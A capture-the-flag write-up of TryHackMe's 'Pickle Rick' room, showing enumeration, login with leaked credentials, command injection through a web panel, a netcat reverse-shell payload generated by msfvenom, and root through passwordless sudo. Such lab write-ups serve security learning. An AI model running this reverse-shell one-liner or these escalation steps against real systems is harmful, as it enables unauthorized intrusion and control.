Pickle Rick CTF – Writeup
This is a CTF on TryHackMe website.
The task is that you will have to help Pickle Rick find 3 ingredients so he can turn himself back into a human.
When you deploy the machine you are presented with a website.
![](https://blog.aghanim.net/wp-content/uploads/2021/05/Skjermbilde-2021-05-23-kl.-00.34.40-1024x486.png)
Table Of Contents
Enumeration stage
The first thing I like to do is look at the source code. We find a username: R1ckRul3s.
![](https://blog.aghanim.net/wp-content/uploads/2021/05/Skjermbilde-2021-05-23-kl.-00.44.29.png)
We can look for any hidden directories. I like to use Gobuster for this task. The command I´ll use is:
gobuster dir -u http://10.10.222.6 -w /usr/share/wordlists/dirb/common.txt -q
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/assets (Status: 301)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
In /robots.txt we find something interesting.
Wubbalubbadubdub
It is smart to use other tools aswell, and not just rely on one. You can use photon, raccoon or Nikto for example. I will use Nikto with the command:
nikto -h 10.10.222.6
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 10.10.222.6
+ Target Hostname: ip-10-10-222-6.eu-west-1.compute.internal
+ Target Port: 80
+ Start Time: 2021-05-22 23:49:17 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x426 0x5818ccf125686
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2021-05-22 23:49:26 (GMT1) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We find an admin login page, /login.php.
![](https://blog.aghanim.net/wp-content/uploads/2021/05/Skjermbilde-2021-05-23-kl.-00.54.26-1024x822.png)
From previous enumeration we found the username, and from robots.txt we would assume that that would be the password.
After logging in, we are presented with this.
Gaining Access
![](https://blog.aghanim.net/wp-content/uploads/2021/05/Skjermbilde-2021-05-23-kl.-00.55.46-1024x421.png)
The other tabs only says that: Only the real rick can enter.
We will try out some commands, like ls.
![](https://blog.aghanim.net/wp-content/uploads/2021/05/Skjermbilde-2021-05-23-kl.-00.57.24.png)
We found the first ingredient. Lets try and cat it.
![](https://blog.aghanim.net/wp-content/uploads/2021/05/Skjermbilde-2021-05-23-kl.-00.58.52.png)
That dosent work. Iinstead I will try and create a reverse shell to the webserver instead.
We can use msvenom to generate a revershell payload that we can try and run.
root@ip-10-10-235-26:~# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.235.26 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 94 bytes
mkfifo /tmp/siank; nc 10.10.83.119 4444 0</tmp/siank | /bin/sh >/tmp/siank 2>&1; rm /tmp/siank
I will setup netcat so it listens to port 4444 and execute the command on the website. This will give me a reverse Shell, and I can try and read the files again.
root@ip-10-10-235-26:~# nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.10.222.6 35688 received!@
ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair
The clue says: Look around the file system for the other ingredient.
cd home
ls
rick
ubuntu
cd rick
ls
second ingredients
cat second\\ ingredients
1 jerry tear
We can try and see if the user is in sudoers. There is no password for sudo, which is not good.
sudo su
su - root
mesg: ttyname failed: Inappropriate ioctl for device
whoami
root
cd /root
ls
3rd.txt
snap
cat 3rd.txt
3rd ingredients: fleeb juice